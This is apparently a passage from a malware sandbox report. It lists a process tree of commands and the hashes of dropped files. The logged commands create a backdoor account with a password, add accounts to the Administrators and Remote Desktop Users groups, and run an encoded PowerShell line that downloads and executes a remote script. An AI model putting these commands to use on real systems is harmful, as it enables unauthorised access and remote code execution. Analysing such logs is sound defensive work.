  Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
- Depth 2: C:\Windows\system32\net.exe
  Command line: net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
- Depth 3: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
- Depth 2: C:\Windows\system32\net.exe
  Command line: net.exe LOCALGROUP "Administrators" updwin /ADD
- Depth 3: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin dm9djaMi
- Depth 2: C:\Windows\system32\net.exe
  Command line: net.exe user updwin dm9djaMi
- Depth 3: C:\Windows\system32\net1.exe
  Command line: C:\Windows\system32\net1 user updwin dm9djaMi
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
- Depth 2: C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic path win32_VideoController get name
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
- Depth 2: C:\Windows\System32\Wbem\WMIC.exe
  Command line: wmic CPU get NAME
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- Depth 1: C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- Depth 2: C:\Windows\system32\cmd.exe
  Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - Blacklisted process makes network request
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.dllMD5
1c24fccd700bf0fc9d10819d2db40625
SHA1dc0142adf0d2dfd4838d2255ebd592c8d901be77
SHA256de03d70f8ef51e10f184b3114461724bbc6cfb697f91da7172230748265f18db
SHA512f3715bd41ed1fa264019ee77ec6ac7e788605fe486a5e33ffeb739dd023fd918febcfdaccc36d4c5fab08f4d414babdec17def5741599767ed281bbe1adeef33
-
C:\Users\Admin\AppData\Local\Temp\RESAD7E.tmpMD5
8c582b2501b04000211837d30077873c
SHA1504c7866540324ef4082d3683d74d8382d2d1d58
SHA256e4a3f446d8d3fd93aa1d10665eca56cb37ef209eaf7efa8d568e10ba86cdd505
SHA512b0720dbbdbdfdae22c346f639a46b007dfc80601e78ca1f192f667504288c650bc62cd059783d42fd6199692e790ce29a18df54a89ec64ced3f245459f3d7e9b
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf